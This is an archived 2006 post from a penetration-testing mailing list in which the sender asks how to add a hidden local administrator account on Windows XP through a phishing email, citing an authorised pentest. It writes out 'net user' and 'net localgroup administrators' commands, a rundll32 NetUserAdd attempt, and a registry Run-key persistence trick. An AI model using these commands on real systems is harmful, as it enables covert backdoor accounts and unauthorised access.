Penetration Testing mailing list archives
add a local admin user without a pop-up ?
From: me <deros68 () yahoo com>
Date: Fri, 1 Dec 2006 15:44:09 -0800 (PST)
We are conducting a pen test that allows social engineering emails sent out that may allow us to take over the the user who opens one of them. I created an email hack but am now wondering how to add a local admin user WITHOUT HAVING A DOS PROMPT POP UP WHEN THE EMAIL IS OPENED. I cannot transport any files (of any sort - no wscript file or vbs or any file!!) to the victim and I am limited to the native XP commands and processes that are on the victim machine. If I catch a victim (catch & release) I will be able to reach the victim machine with native XP means (net use - nc to ports etc..). The victim then gets scolded about opening inappropriate emails... The victim is almost always an administrator or power user so almost any command or process can be used. I tried many/many variants of invoking the "Cmd.exe" shell but so far it always creates a momentary DOS screen pop-up. tired many variants similar to below: CMD.EXE /Q /C net user testx password /add or start /B /wait cmd /Q /C c:\windows\system32\net.exe user testx password /add pop-ups in either case I have used rundll32.exe in the past to avoid pop-ups (in most cases) so I tried: rundll32.exe netapi32.dll,NetUserAdd (%COMPUTERNAME%,1,(NEWUSER,PASSWORD),0) (wrapped) I tried many variants of the above but I always get a pop up "An Exception occurred while trying to run netapi32.dll.." OK I plugged netapi32.dll into Olly and saw the dll entry NetUserAdd takes 4 parms -but the 3rd parm is a LBYTE pointer to the input buffer. I wonder if rundll32.exe can construct such a pointer for me? Using only the programs and API calls available from what is essentially an XP DOS shell - does anyone have a better way to do this without creating a DOS pop-up ? I have already figured out how to write the "net user Username PSWD /add" & "net localgroup administrators Username /add" cmds to the registry (the run key) - without creating a pop-up! (Silently..) However, the problem with the above is that it requires a logon/logoff or re-boot to occur before the user is added. Thus my quest for a silent (no pop-up) but immediate means to do this. Since the email interface can call a winapi - I may have to try to call netapi32.dll/NetUserAdd - I hope that I do not have to do that - the test may be over - before I can decipher the correct syntax between my email system and the STDCALL Winapi Thanks ____________________________________________________________________________________ Have a burning question? Go to www.Answers.yahoo.com and get answers from real people who know. ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------
Current thread:
- add a local admin user without a pop-up ? me (Dec 03)
- RE: add a local admin user without a pop-up ? Jason M Frey (Dec 04)
- Re: add a local admin user without a pop-up ? Lee Lawson (Dec 04)
- Re: add a local admin user without a pop-up ? killy (Dec 07)